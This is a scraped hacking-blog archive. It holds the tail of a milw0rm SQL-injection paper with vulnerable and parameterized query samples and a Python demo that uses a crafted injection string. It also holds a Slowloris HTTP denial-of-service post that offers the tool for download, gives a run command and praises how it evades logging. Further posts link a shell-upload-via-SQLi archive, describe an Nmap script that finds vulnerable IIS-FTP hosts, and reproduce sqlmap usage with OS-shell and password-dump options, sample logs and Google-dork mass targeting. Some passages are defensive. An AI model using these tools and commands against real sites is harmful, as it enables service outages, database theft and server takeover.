- Use whitelist input: because we cannot know all bad inputs, the efficient way is to allow only known-valid input.
- Check input type: in some cases attackers inject a string into a numeric input field or a number into a string input field;
either can lead to SQL injection.
- Escape database metacharacters: use / in order to escape database metacharacters by prepending / in front of them.
- Don't ignore any source of input: attackers can manipulate input to exploit SQL vulnerabilities, so you must check not only the query string but also headers,
cookies and form fields.
- Use Parameterized Queries: MSSQL provides an API for handling inputs which helps prevent SQL injection.
This mechanism is called "Parameterized Queries".
The following two code samples illustrate the difference between an unsafe query dynamically constructed out of
user data and its safe parameterized counterpart.
In the first, the user-supplied name parameter is embedded directly into a SQL statement, leaving the
application vulnerable to SQL injection:
//define the query structure
String queryText = "select ename,sal from emp where ename ='";
//concatenate the user-supplied name (vulnerable: the input becomes part of the SQL text)
queryText += request.getParameter("name");
queryText += "'";
//execute the query
Statement stmt = con.createStatement();
ResultSet rs = stmt.executeQuery(queryText);
In the second example, the query structure is defined using a question mark as a placeholder
for the user-supplied parameter. The prepareStatement method is invoked to interpret this, and fix the structure
of the query that is to be executed. Only then is the setString method used to specify the actual value of
the parameter. Because the query's structure has already been fixed, this value can contain any data at all,
without affecting the structure. The query is then executed safely:
//define the query structure
String queryText = "select ename,sal from emp where ename = ?";
//prepare the statement through DB connection "con"
PreparedStatement stmt = con.prepareStatement(queryText);
//add the user input to variable 1 (at the first ? placeholder)
stmt.setString(1, request.getParameter("name"));
//execute the query
ResultSet rs = stmt.executeQuery();
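As an added example (not code from the paper; Python with an in-memory SQLite database standing in for the JDBC connection "con"), the two samples above side by side, plus the whitelist check for a numeric field from the countermeasures list. The emp rows, the crafted name and the employee-id format are constructed assumptions.

```python
import sqlite3

# Constructed sample rows (not from the paper) for the emp table the two Java samples query.
EMPLOYEES = [("alice", 5000), ("bob", 4200), ("carol", 6100)]


def open_db():
    """In-memory SQLite stand-in for the JDBC connection "con" used in the samples."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE emp (ename TEXT, sal INTEGER)")
    con.executemany("INSERT INTO emp VALUES (?, ?)", EMPLOYEES)
    return con


def lookup_unsafe(con, name):
    """Mirrors the first sample: the name is concatenated into the SQL text,
    so a quote character in the input changes the structure of the query."""
    query_text = "select ename, sal from emp where ename = '" + name + "'"
    return con.execute(query_text).fetchall()


def lookup_safe(con, name):
    """Mirrors the second sample: the structure is fixed with a ? placeholder
    and the value is bound afterwards, so the input can only ever be data."""
    return con.execute("select ename, sal from emp where ename = ?", (name,)).fetchall()


def parse_employee_id(raw):
    """The 'check input type' / whitelist countermeasure for a numeric field:
    accept a plain decimal integer, return None for anything else."""
    return int(raw) if raw.isdigit() else None


def demo():
    """Run both lookups with a normal name and with a constructed name that
    carries a quote: the unsafe query returns every row, the safe one none."""
    con = open_db()
    crafted = "x' OR '1'='1"  # constructed input: closes the literal and appends a condition
    return {
        "unsafe_normal": lookup_unsafe(con, "alice"),
        "unsafe_crafted": lookup_unsafe(con, crafted),
        "safe_normal": lookup_safe(con, "alice"),
        "safe_crafted": lookup_safe(con, crafted),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```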
#####################
[0x07] - References
#####################
[1] Error based SQL injection - a true story: AnalyseR
[2] Advanced SQL Injection In SQL Server Applications: Chris Anley
[3] ASCII Encoded/Binary String Automated SQL Injection Attack: Michael Zino
[4] http://pentestmonkey.net
[5] http://www.owasp.org
[6] http://www.milw0rm.com
####################
[0x08] - Greetz To
####################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
----------------------------------------------------
This paper is written for educational purposes only. The authors are not responsible for any damage
originating from using this paper for a wrong objective. If you want to use this knowledge on other persons' systems,
you must request consent from the system owner before
----------------------------------------------------
# milw0rm.com [2009-01-29]</a></stdin></stdin></pre><pre><b>Source:</b></pre><pre><a href="http://www.milw0rm.com/papers/279">http://www.milw0rm.com/papers/279</a></pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-60894981506191562202010-01-28T17:52:00.000-08:002010-11-28T17:59:10.934-08:00Slowloris HTTP DoS<pre>[Slowloris ASCII-art logo omitted]</pre><b>Welcome to <b style="background-color: #ffff66; color: black;">Slowloris</b> - the low bandwidth, yet greedy and poisonous HTTP client!</b><br />
Written by <a href="http://ha.ckers.org/">RSnake</a> with help from John Kinsella, and a dash of inspiration from <a href="http://www.outpost24.com/">Robert E Lee</a>.<br />
<b>UPDATE 2:</b> Video presentation of <b style="background-color: #ffff66; color: black;">Slowloris</b> at DefCon (the middle section of the presentation) can be seen here: <a href="http://vimeo.com/7618090">Hijacking Web 2.0 Sites with SSLstrip and <b style="background-color: #ffff66; color: black;">SlowLoris</b> -- Sam Bowne and RSnake at Defcon 17</a>.<br />
<b>UPDATE:</b> Amit Klein pointed me to a <a href="http://www.securityfocus.com/archive/1/456339/30/0/threaded">post written by Adrian Ilarion Ciobanu in early 2007</a> that perfectly describes this denial of service attack. It was also described in 2005 in the "Programming Model Attacks" section of Apache Security. So although there was no tool released at that time, these two still technically deserve all the credit for this. I apologize for having missed these.<br />
In considering the ramifications of a slow denial of service attack against particular services, rather than flooding networks, a concept emerged that would allow a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports. The ideal situation for many denial of service attacks is where all other services remain intact but the webserver itself is completely inaccessible. <b style="background-color: #ffff66; color: black;">Slowloris</b> was born from this concept, and is therefore relatively stealthy compared to most flooding tools.<br />
<br />
<b style="background-color: #ffff66; color: black;">Slowloris</b> holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing. In this way webservers can be quickly tied up. In particular, servers that have threading will tend to be vulnerable, by virtue of the fact that they attempt to limit the amount of threading they'll allow. <b style="background-color: #ffff66; color: black;">Slowloris</b> must wait for all the sockets to become available before it's successful at consuming them, so if it's a high traffic website, it may take a while for the site to free up its sockets. So while you may be unable to see the website from your vantage point, others may still be able to see it until all sockets are freed by them and consumed by <b style="background-color: #ffff66; color: black;">Slowloris</b>. This is because other users of the system must finish their requests before the sockets become available for <b style="background-color: #ffff66; color: black;">Slowloris</b> to consume. If others re-initiate their connections in that brief time-period they'll still be able to see the site. So it's a bit of a race condition, but one that <b style="background-color: #ffff66; color: black;">Slowloris</b> will eventually always win - and sooner rather than later.<br />
<br />
<b style="background-color: #ffff66; color: black;">Slowloris</b> also has a few stealth features built into it. Firstly, it can be changed to send different host headers, if your target is a virtual host and logs are stored separately per virtual host. But most importantly, while the attack is underway, the log file won't be written until the request is completed. So you can keep a server down for minutes at a time without a single log file entry showing up to warn someone who might be watching in that instant. Of course once your attack stops or once the session gets shut down there will be several hundred 400 errors in the web server logs. That's unavoidable as <b style="background-color: #ffff66; color: black;">Slowloris</b> sits today, although it may be possible to turn them into 200 OK messages instead by completing a valid request, but <b style="background-color: #ffff66; color: black;">Slowloris</b> doesn't yet do that.<br />
<br />
HTTPReady quickly came up as a possible solution to a <b style="background-color: #ffff66; color: black;">Slowloris</b> attack, because it won't cause the HTTP server to launch until a full request is received. This is true only for GET and HEAD requests. As long as you give <b style="background-color: #ffff66; color: black;">Slowloris</b> the switch to modify its method to POST, HTTPReady turns out to be a worthless defense against this type of attack.<br />
<br />
This is <b><i>NOT</i></b> a TCP DoS, because it is actually making a full TCP connection, not a partial one, however it <i>is</i> making partial HTTP requests. It's the equivalent of a SYN flood but over HTTP. One example of the difference is that if there are two web-servers running on the same machine one server can be DoSed without affecting the other webserver instance. <b style="background-color: #ffff66; color: black;">Slowloris</b> would also theoretically work over other protocols like UDP, if the program was modified slightly and the webserver supported it. <b style="background-color: #ffff66; color: black;">Slowloris</b> is also <b><i>NOT</i></b> a GET request flooder. <b style="background-color: #ffff66; color: black;">Slowloris</b> requires only a few hundred requests at long term and regular intervals, as opposed to tens of thousands on an ongoing basis.<br />
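As an added example (not part of RSnake's post or the slowloris tool), the defender's side of the race described above: a request-header read timeout that extends only as bytes actually arrive, modelled on the approach Apache's mod_reqtimeout takes, together with a live count of incomplete connections per client, which matters because the access log shows nothing until a request completes. The policy values, client addresses and timeline are assumptions.<br />

```python
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class HeaderReadPolicy:
    """Assumed policy values for the request-header phase: a connection gets
    an initial time budget, earns one extra second per min_rate bytes it
    actually sends, and is never allowed more than max_timeout in total."""
    initial_timeout: float = 20.0
    max_timeout: float = 40.0
    min_rate: int = 500


@dataclass
class Connection:
    """One accepted TCP connection that is still reading request headers."""
    client: str
    opened_at: float
    bytes_received: int = 0
    complete: bool = False  # True once the blank line ending the headers arrived


def header_deadline(conn, policy):
    """Absolute time by which this connection's headers must be complete."""
    earned = conn.bytes_received // policy.min_rate
    budget = min(policy.max_timeout, policy.initial_timeout + earned)
    return conn.opened_at + budget


def connections_to_close(conns, now, policy):
    """Connections still in the header phase that have overrun their deadline;
    closing them frees the worker slots a partial request would otherwise hold."""
    return [c for c in conns if not c.complete and now > header_deadline(c, policy)]


def clients_over_limit(conns, limit):
    """Clients holding more than `limit` incomplete connections at once. This is
    observable live, whereas the access log stays empty until requests complete."""
    held = Counter(c.client for c in conns if not c.complete)
    return {client: n for client, n in held.items() if n > limit}


def simulate(policy=HeaderReadPolicy()):
    """Constructed timeline: a normal client finished its ~300-byte request at
    t=0.3 s; one slow client opened 300 connections and dripped a ~40-byte header
    line into each at t=0, 10 and 20 s. Evaluate the policy at t=21 s."""
    normal = Connection("10.0.0.5", opened_at=0.0, bytes_received=300, complete=True)
    slow = [Connection("198.51.100.9", opened_at=0.0, bytes_received=3 * 40) for _ in range(300)]
    now = 21.0
    closed = connections_to_close([normal] + slow, now, policy)
    return {
        "closed": len(closed),
        "normal_closed": normal in closed,
        "flagged": clients_over_limit([normal] + slow, limit=50),
    }


if __name__ == "__main__":
    print(simulate())
```

A client that sends at a steady rate keeps earning time (12000 bytes by t=30 s reaches the 40 s cap), so only connections that stall in the header phase are cut off.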
<br />
Interestingly enough, in testing this has been shown in at least one instance to lock up database connections and force other strange issues and errors to arise that can allow for fingerprinting and other odd things to become obvious once the DoS is complete and the server attempts to clean itself up. I would guess that this issue arises when the webserver is allowed to open more connections than the database is, causing the database to fail first and for longer than the webserver.<br />
<br />
<b style="background-color: #ffff66; color: black;">Slowloris</b> lets the webserver return to normal almost instantly (usually within 5 seconds or so). That makes it ideal for certain attacks that may just require a brief down-time. As described in <a href="http://ha.ckers.org/blog/20090504/using-denial-of-service-for-hacking/">this blog post, DoS is actually very useful for certain types of attacks</a> where timing is key, or as a diversionary tactic, etc....<br />
This affects a number of webservers that use threaded processes and ironically attempt to limit that to prevent memory exhaustion - fixing one problem created another. This includes but is not necessarily limited to the following:<br />
<br />
<ul><li>Apache 1.x </li>
<li>Apache 2.x </li>
<li>dhttpd </li>
<li>GoAhead WebServer </li>
<li>WebSense "block pages" (unconfirmed) </li>
<li>Trapeze Wireless Web Portal (unconfirmed) </li>
<li>Verizon's MI424-WR FIOS Cable modem (unconfirmed) </li>
<li>Verizon's Motorola Set-Top Box (port 8082 and requires auth - unconfirmed) </li>
<li><a href="http://www.bee-ware.net/en/">BeeWare</a> WAF (unconfirmed) </li>
<li><a href="http://www.denyall.com/">Deny All</a> WAF (unconfirmed) </li>
</ul>There are a number of webservers that this doesn't affect as well, in my testing:<br />
<br />
<ul><li>IIS6.0 </li>
<li>IIS7.0 </li>
<li>lighttpd </li>
<li>Squid </li>
<li>nginx </li>
<li>Cherokee (<a href="http://lists.octality.com/pipermail/cherokee/2009-June/010530.html">verified by user community</a>) </li>
<li>Netscaler </li>
<li>Cisco CSS (<a href="http://www.cupfighter.net/index.php/2009/06/slowloris-css/">verified by user community</a>) </li>
</ul>This is obviously not a complete list, and there may be a number of variations on these web-servers that are or are not vulnerable. I didn't test every configuration or variant, so your mileage may vary. This also may not work if there is an upstream device that somehow limits/buffers/proxies HTTP requests. Please note though that <b><b style="background-color: #ffff66; color: black;">Slowloris</b> only represents one variant of this attack</b> and other variants may have different impacts on other webservers and upstream devices. This command should work on most systems, but please be sure to check the options as well:<br />
<b>perl <b style="background-color: #ffff66; color: black;">slowloris</b>.pl -dns example.com</b><br />
Requirements: This is a Perl program requiring the Perl interpreter with the modules <a href="http://perldoc.perl.org/IO/Socket/INET.html">IO::Socket::INET</a>, <a href="http://search.cpan.org/%7Ebehroozi/IO-Socket-SSL-0.97/">IO::Socket::SSL</a>, and <a href="http://search.cpan.org/%7Ejv/Getopt-Long-2.38/">Getopt::Long</a>. <b style="background-color: #ffff66; color: black;">Slowloris</b> works MUCH better and faster if you have threading, so I highly encourage you to also install threads and threads::shared if you don't have those modules already. You can install modules using CPAN:<br />
<blockquote>perl -MCPAN -e 'install IO::Socket::INET'<br />
perl -MCPAN -e 'install IO::Socket::SSL'</blockquote><img align="left" height="50" src="http://ha.ckers.org/images/microsoft_icon.gif" width="50" /><b>Windows users</b>: You probably will not be able to successfully execute a <b style="background-color: #ffff66; color: black;">Slowloris</b> denial of service from Windows even if you use <a href="http://www.cygwin.com/">Cygwin</a>. I have not had any luck getting <b style="background-color: #ffff66; color: black;">Slowloris</b> to successfully deny service from within Windows, because <b style="background-color: #ffff66; color: black;">Slowloris</b> requires more than a few hundred sockets to work (sometimes a thousand or more), and Windows limits sockets to around 130, from what I've seen. I highly suggest you use a *NIX operating system to execute <b style="background-color: #ffff66; color: black;">Slowloris</b> from for the best results, and not from within a virtual machine, as that could have unexpected results based on the parent operating system.<br />
Version: <b style="background-color: #ffff66; color: black;">Slowloris</b> is currently at version 0.7 - 06/17/2009<br />
<br />
Download: <a href="http://ha.ckers.org/slowloris/slowloris.pl"><b style="background-color: #ffff66; color: black;">slowloris</b>.pl</a><br />
<br />
Getting started: <b>perldoc <b style="background-color: #ffff66; color: black;">slowloris</b>.pl</b><br />
Issues: For a complete list of issues look at the Perl documentation, which explains all of the things to think about when running this denial of service attack.<br />
Thanks: Thank you to John Kinsella for the help with threading and <a href="http://ha.ckers.org/blog/about/">id</a> and greyhat for help with testing.<br />
<br />
<b>Reference:</b> <br />
http://ha.ckers.org/slowloris/Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-36958052038969222552009-10-20T09:11:00.000-07:002009-10-20T13:40:01.688-07:00Uploading Shell Through SQL Injection [Into Outfile]Uploading Shell Through SQL Injection [Into Outfile]<br /><br />http://rapidshare.com/files/22917340/mysql_into_outfile.rar.html<br /><br />http://rapidshare.de/files/46569137/mysql_into_outfile.zip.html<br />Pass: security-shell.wsUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-36600226558832998902009-09-04T15:41:00.000-07:002009-09-04T15:45:40.876-07:00Detecting Vulnerable IIS-FTP Hosts Using NmapBased on an existing Nmap script, I quickly wrote a new one which performs the following actions:<br /><br /> * Check if anonymous sessions are allowed.<br /> * Check if the detected FTP server is running Microsoft ftpd.<br /> * Check if the MKDIR command is allowed (this seems to be required by the exploit)<br /><br />If all those conditions are met, the script exits with a warning message. Note that my script will only report servers which could be vulnerable. 
On the other side, running a server with anonymous users able to create directories is a major security breach and must be fixed independently of the newly discovered vulnerability!<br /><br />To use the Nmap script, copy it into your local script repository (something like /usr/local/share/nmap/scripts/) and rebuild your scripts index:<br /><br /># nmap --script-updatedb<br /><br />Then, the script will be executed against all detected FTP servers (using the “-sC” argument) or you can specify only one script to be executed (for speed):<br /><font color=yellow><br /># nmap -p 21 -sV --script=IIS-FTP 10.0.0.7<br /></font><br />Starting Nmap 4.76 ( http://nmap.org ) at 2009-09-01 01:15 CEST<br />Interesting ports on test-win (10.0.0.7):<br />PORT STATE SERVICE VERSION<br />21/tcp open ftp Microsoft ftpd<br />|_ IIS FTP: IIS Server allow anonymous and mkdir (potentially vulnerable)<br />Service Info: OS: Windows<br /><br />The script is available here. Note that it is provided “as is”. It’s just a quick hack which worked for me.<br /><br />Maybe you were not aware of the Nmap scripting capabilities. 
Feel free to read this small introduction to Nmap scripting.<br /><br /><b>Reference:</b><br /><a href="http://blog.rootshell.be/2009/09/01/detecting-vulnerable-iis-ftp-hosts-using-nmap/" target="_blank">http://blog.rootshell.be/2009/09/01/detecting-vulnerable-iis-ftp-hosts-using-nmap/</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-60968963527207064592009-08-23T10:12:00.000-07:002009-08-23T10:37:25.571-07:00sqlmap 0.7Consider that the target url is:<br /><br /><font color=royalblue> http://192.168.1.121/sqlmap/mysql/get_int.php?id=1 </font><br /><br />Assume that:<br /><br /><font color=royalblue> http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=1 </font><br /><br />is the same page as the original one and:<br /><br /><font color=royalblue> http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=2 </font><br /><br /><b>Usage</b><br />$<font color=lime> python sqlmap.py -h </font><br /> <br /> sqlmap/0.7<br /> by Bernardo Damele A. G. <bernardo.damele@gmail.com><br /> <br />Usage: sqlmap.py [options]<br /><br />Options:<br /> --version show program's version number and exit<br /> -h, --help show this help message and exit<br /> -v VERBOSE Verbosity level: 0-5 (default 1)<br /><br /> Target:<br /> At least one of these options has to be specified to set the source to<br /> get target urls from.<br /><br /> -u URL, --url=URL Target url<br /> -l LIST Parse targets from Burp or WebScarab logs<br /> -g GOOGLEDORK Process Google dork results as target urls<br /> -c CONFIGFILE Load options from a configuration INI file<br /><br /> Request:<br /> These options can be used to specify how to connect to the target url.<br /><br /> --method=METHOD HTTP method, GET or POST (default GET)<br /> --data=DATA Data string to be sent through POST<br /> --cookie=COOKIE HTTP Cookie header<br /> --referer=REFERER HTTP Referer header<br /> --user-agent=AGENT HTTP User-Agent header<br /> -a USERAGENTSFILE Load a random HTTP User-Agent header from 
file<br /> --headers=HEADERS Extra HTTP headers newline separated<br /> --auth-type=ATYPE HTTP Authentication type (value Basic or Digest)<br /> --auth-cred=ACRED HTTP Authentication credentials (value name:password)<br /> --proxy=PROXY Use a HTTP proxy to connect to the target url<br /> --threads=THREADS Maximum number of concurrent HTTP requests (default 1)<br /> --delay=DELAY Delay in seconds between each HTTP request<br /> --timeout=TIMEOUT Seconds to wait before timeout connection (default 30)<br /> --retries=RETRIES Retries when the connection timeouts (default 3)<br /><br /> Injection:<br /> These options can be used to specify which parameters to test for,<br /> provide custom injection payloads and how to parse and compare HTTP<br /> responses page content when using the blind SQL injection technique.<br /><br /> -p TESTPARAMETER Testable parameter(s)<br /> --dbms=DBMS Force back-end DBMS to this value<br /> --os=OS Force back-end DBMS operating system to this value<br /> --prefix=PREFIX Injection payload prefix string<br /> --postfix=POSTFIX Injection payload postfix string<br /> --string=STRING String to match in page when the query is valid<br /> --regexp=REGEXP Regexp to match in page when the query is valid<br /> --excl-str=ESTRING String to be excluded before comparing page contents<br /> --excl-reg=EREGEXP Matches to be excluded before comparing page contents<br /><br /> Techniques:<br /> These options can be used to test for specific SQL injection technique<br /> or to use one of them to exploit the affected parameter(s) rather than<br /> using the default blind SQL injection technique.<br /><br /> --stacked-test Test for stacked queries (multiple statements) support<br /> --time-test Test for time based blind SQL injection<br /> --time-sec=TIMESEC Seconds to delay the DBMS response (default 5)<br /> --union-test Test for UNION query (inband) SQL injection<br /> --union-tech=UTECH Technique to test for UNION query SQL injection<br /> --union-use 
Use the UNION query (inband) SQL injection to retrieve<br /> the queries output. No need to go blind<br /><br /> Fingerprint:<br /> -f, --fingerprint Perform an extensive DBMS version fingerprint<br /><br /> Enumeration:<br /> These options can be used to enumerate the back-end database<br /> management system information, structure and data contained in the<br /> tables. Moreover you can run your own SQL statements.<br /><br /> -b, --banner Retrieve DBMS banner<br /> --current-user Retrieve DBMS current user<br /> --current-db Retrieve DBMS current database<br /> --is-dba Detect if the DBMS current user is DBA<br /> --users Enumerate DBMS users<br /> --passwords Enumerate DBMS users password hashes (opt -U)<br /> --privileges Enumerate DBMS users privileges (opt -U)<br /> --dbs Enumerate DBMS databases<br /> --tables Enumerate DBMS database tables (opt -D)<br /> --columns Enumerate DBMS database table columns (req -T opt -D)<br /> --dump Dump DBMS database table entries (req -T, opt -D, -C)<br /> --dump-all Dump all DBMS databases tables entries<br /> -D DB DBMS database to enumerate<br /> -T TBL DBMS database table to enumerate<br /> -C COL DBMS database table column to enumerate<br /> -U USER DBMS user to enumerate<br /> --exclude-sysdbs Exclude DBMS system databases when enumerating tables<br /> --start=LIMITSTART First query output entry to retrieve<br /> --stop=LIMITSTOP Last query output entry to retrieve<br /> --sql-query=QUERY SQL statement to be executed<br /> --sql-shell Prompt for an interactive SQL shell<br /><br /> File system access:<br /> These options can be used to access the back-end database management<br /> system underlying file system.<br /><br /> --read-file=RFILE Read a file from the back-end DBMS file system<br /> --write-file=WFILE Write a local file on the back-end DBMS file system<br /> --dest-file=DFILE Back-end DBMS absolute filepath to write to<br /><br /> Operating system access:<br /> This option can be used to access the back-end 
database management<br /> system underlying operating system.<br /><br /> --os-cmd=OSCMD Execute an operating system command<br /> --os-shell Prompt for an interactive operating system shell<br /> --os-pwn Prompt for an out-of-band shell, meterpreter or VNC<br /> --os-smbrelay One click prompt for an OOB shell, meterpreter or VNC<br /> --os-bof Stored procedure buffer overflow exploitation<br /> --priv-esc User priv escalation by abusing Windows access tokens<br /> --msf-path=MSFPATH Local path where Metasploit Framework 3 is installed<br /> --tmp-path=TMPPATH Remote absolute path of temporary files directory<br /><br /> Miscellaneous:<br /> --eta Display for each output the estimated time of arrival<br /> --update Update sqlmap to the latest stable version<br /> -s SESSIONFILE Save and resume all data retrieved on a session file<br /> --save Save options on a configuration INI file<br /> --batch Never ask for user input, use the default behaviour<br /> --cleanup Clean up the DBMS by sqlmap specific UDF and tables<br /><br /><br /><b>5.1 Output verbosity</b><br /><br />Option: -v<br /><br />Verbose options can be used to set the verbosity level of output messages. There exist six levels. The default level is 1 in which information, warnings, errors and tracebacks, if they occur, will be shown. 
Level 2 shows also debug messages, level 3 shows also HTTP requests with all HTTP headers sent, level 4 shows also HTTP responses headers and level 5 shows also HTTP responses page content.<br /><br />Example on a MySQL 5.0.67 target (verbosity level 1):<br /><br /> $ <font color=lime>python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 </font><br /><font color=aqua><br /> [hh:mm:12] [INFO] testing connection to the target url<br /> [hh:mm:12] [INFO] testing if the url is stable, wait a few seconds<br /> [hh:mm:14] [INFO] url is stable<br /> [hh:mm:14] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic<br /> [hh:mm:14] [WARNING] User-Agent parameter 'User-Agent' is not dynamic<br /> [hh:mm:14] [INFO] testing if GET parameter 'id' is dynamic<br /> [hh:mm:14] [INFO] confirming that GET parameter 'id' is dynamic<br /> [hh:mm:14] [INFO] GET parameter 'id' is dynamic<br /> [hh:mm:14] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis<br /> [hh:mm:14] [INFO] testing unescaped numeric injection on GET parameter 'id'<br /> [hh:mm:14] [INFO] confirming unescaped numeric injection on GET parameter 'id'<br /> [hh:mm:14] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis<br /> [hh:mm:14] [INFO] testing for parenthesis on injectable parameter<br /> [hh:mm:14] [INFO] the injectable parameter requires 0 parenthesis<br /> [hh:mm:14] [INFO] testing MySQL<br /> [hh:mm:14] [INFO] query: CONCAT(CHAR(53), CHAR(53))<br /> [hh:mm:14] [INFO] retrieved: 55<br /> [hh:mm:14] [INFO] performed 20 queries in 0 seconds<br /> [hh:mm:14] [INFO] confirming MySQL<br /> [hh:mm:14] [INFO] query: LENGTH(CHAR(53))<br /> [hh:mm:14] [INFO] retrieved: 1<br /> [hh:mm:14] [INFO] performed 13 queries in 0 seconds<br /> [hh:mm:14] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1<br /> [hh:mm:14] [INFO] retrieved: 5<br /> [hh:mm:14] [INFO] performed 13 queries in 0 seconds<br /><font color=red> web server operating 
system: Linux Ubuntu 8.10 (Intrepid Ibex)<br /> web application technology: PHP 5.2.6, Apache 2.2.9<br /> back-end DBMS: MySQL >= 5.0.0 </font><br /></font><br /><br /><b>To run sqlmap on a single target URL.</b><br /><br />Example on a MySQL 5.0.67 target:<br /><br /> $ <font color=lime> python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" </font><br /><br /> [...]<br /><font color=red> web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)<br /> web application technology: PHP 5.2.6, Apache 2.2.9<br /> back-end DBMS: MySQL >= 5.0.0</font><br /><br /><b>Process Google dork results as target urls</b><br /><br />Option: -g<br /><br />It is also possible to test and inject on GET parameters on the results of your Google dork.<br /><br />This option makes sqlmap negotiate with the search engine its session cookie to be able to perform a search, then sqlmap will retrieve Google first 100 results for the Google dork expression with GET parameters asking you if you want to test and inject on each possible affected URL.<br /><br />Example of Google dorking with expression site:yourdomain.com ext:php:<br /><br /> $ <font color=lime> python sqlmap.py -g "site:yourdomain.com ext:php" -v 1 </font><br /><font color=aqua><br /> [hh:mm:38] [INFO] first request to Google to get the session cookie<br /> [hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are <br /> testable hosts<br /> [hh:mm:41] [INFO] sqlmap got a total of 59 targets<br /> [hh:mm:40] [INFO] url 1:<br /> GET http://yourdomain.com/example1.php?foo=12, do you want to test this <br /> url? [y/N/q] n<br /> [hh:mm:43] [INFO] url 2:<br /> GET http://yourdomain.com/example2.php?bar=24, do you want to test this <br /> url? [y/N/q] n<br /> [hh:mm:42] [INFO] url 3:<br /> GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you <br /> want to test this url? 
[y/N/q] y<br /> [hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483<br /> [hh:mm:45] [INFO] testing if the url is stable, wait a few seconds<br /> [hh:mm:49] [INFO] url is stable<br /> [hh:mm:50] [INFO] testing if GET parameter 'today' is dynamic<br /> [hh:mm:51] [INFO] confirming that GET parameter 'today' is dynamic<br /> [hh:mm:53] [INFO] GET parameter 'today' is dynamic<br /> [hh:mm:54] [INFO] testing sql injection on GET parameter 'today'<br /> [hh:mm:56] [INFO] testing numeric/unescaped injection on GET parameter 'today'<br /> [hh:mm:57] [INFO] confirming numeric/unescaped injection on GET parameter 'today'<br /> [hh:mm:58] [INFO] GET parameter 'today' is numeric/unescaped injectable<br /> [...]<br /></font><br /><br /><h1><b>HTTP proxy</b></h1><br /><br />Option: --proxy<br /><br />It is possible to provide an anonymous HTTP proxy address to pass by the HTTP requests to the target URL. The syntax of HTTP proxy value is http://url:port.<br /><br />Example on a PostgreSQL 8.3.5 target:<br /><br /> $ <font color=lime>python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \<br /> --proxy "http://192.168.1.47:3128" </font><br /><font color=aqua><br /> [hh:mm:36] [WARNING] User-Agent parameter 'User-Agent' is not dynamic<br /> [hh:mm:36] [WARNING] GET parameter 'cat' is not dynamic<br /> [hh:mm:37] [WARNING] the back-end DMBS is not MySQL<br /> [hh:mm:37] [WARNING] the back-end DMBS is not Oracle<br /> back-end DBMS: PostgreSQL<br /></font><br />Instead of using a single anonymous HTTP proxy server to pass by, you can configure a Tor client together with Privoxy on your machine as explained on the Tor client guide then run sqlmap as follows:<br /><br /> $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \<br /> --proxy "http://192.168.1.47:8118"<br /><br />Note that 8118 is the default Privoxy port, adapt it to your settings.<br /><br /><a 
href="http://sqlmap.sourceforge.net/doc/README.html" target="_blank">http://sqlmap.sourceforge.net/doc/README.html</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-49392152926689530702009-08-01T03:13:00.000-07:002009-08-23T15:09:03.074-07:00Interview Questions for Security/Network/Unix guy<a href="http://www.techinterviews.com/security-interview-questions-for-network-admin" target="_blank">http://www.techinterviews.com/security-interview-questions-for-network-admin</a><br /><br /><a href="http://www.geekinterview.com/Interview-Questions/Networking/Networks-and-Security" target="_blank">http://www.geekinterview.com/Interview-Questions/Networking/Networks-and-Security</a><br /><br /><a href="http://danielmiessler.com/blog/10-questions-to-ask-during-an-information-security-interview" target="_blank">http://danielmiessler.com/blog/10-questions-to-ask-during-an-information-security-interview</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-88622593985777984122009-07-23T00:43:00.000-07:002009-07-23T00:51:57.149-07:00Gathering DNS information<a href="http://searchdns.netcraft.com/?position=limited&host=facebook.com" target="_blank"><font color=royalblue>http://searchdns.netcraft.com/?position=limited&host=<font color=red>facebook.com</font></font></a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-83763719454497405642009-07-14T22:38:00.000-07:002010-09-28T03:28:40.620-07:00rCom's SQLi Tutorial { reMix }Contents At A Glance:<br />
<br />
<strong>1. Introduction(Kinda Pointless)</strong><br />
<strong>2. Finding Vulnerable Sites.</strong><br />
<strong>3. Getting Number of Columns.</strong><br />
<strong>4. Getting MySQL Version.</strong><br />
<strong>5. Getting Database Names.</strong><br />
<strong>6. Getting Database User.</strong><br />
<strong>7. Getting Table Names.</strong><br />
<strong>8. Getting Column Names.</strong><br />
<strong>9. LIMIT, What is it and why do I need to know it?</strong><br />
<strong>10. End Notes</strong><br />
<br />
<strong><span class="Apple-style-span" style="color: orange;"><span class="Apple-style-span" style="font-size: x-large;">1. Introduction(Kinda Pointless)</span></span></strong><br />
